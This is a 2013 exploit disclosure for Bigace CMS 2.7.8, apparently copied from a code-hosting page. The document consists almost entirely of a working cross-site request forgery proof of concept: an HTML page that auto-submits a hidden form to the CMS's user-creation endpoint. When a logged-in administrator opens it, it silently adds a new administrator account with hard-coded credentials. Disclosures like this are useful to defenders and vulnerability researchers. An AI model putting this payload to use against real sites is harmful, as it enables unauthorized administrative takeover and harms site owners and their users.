34 lines
No EOL
1.3 KiB
HTML
34 lines
No EOL
1.3 KiB
HTML
###########################################################################################
|
|
# Exploit Title: Bigace CMS CSRF - Adding an admin account
|
|
# Date: 2013 29 July
|
|
# Exploit Author: Yashar shahinzadeh
|
|
# Credit goes for: ha.cker.ir
|
|
# Vendor Homepage: http://www.bigace.de/
|
|
# Tested on: Linux & Windows, PHP 5.2.9
|
|
# Affected Version : 2.7.8
|
|
#
|
|
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir }
|
|
###########################################################################################
|
|
|
|
Summary:
|
|
========
|
|
1. CSRF - Adding an admin account
|
|
|
|
|
|
1. CSRF - Adding an admin account:
|
|
==================================
|
|
|
|
<html>
|
|
<body onload="submitForm()">
|
|
<form name="myForm" id="myForm"
|
|
action="[Path to Bigace CMS]/index.php?cmd=admin&id=userCreate_tADMIN_len&mode=create" method="post">
|
|
<input type="hidden" name="userName" value="yashar">
|
|
<input type="hidden" name="language" value="en">
|
|
<input type="hidden" name="userGroups[]" value="40">
|
|
<input type="hidden" name="state" value="1">
|
|
<input type="hidden" name="email" value="yashar@yashar.com">
|
|
<input type="hidden" name="passwordnew" value="yashar">
|
|
<input type="hidden" name="passwordcheck" value="yashar">
|
|
</form>
|
|
<script type='text/javascript'>document.myForm.submit();</script>
|
|
</html> |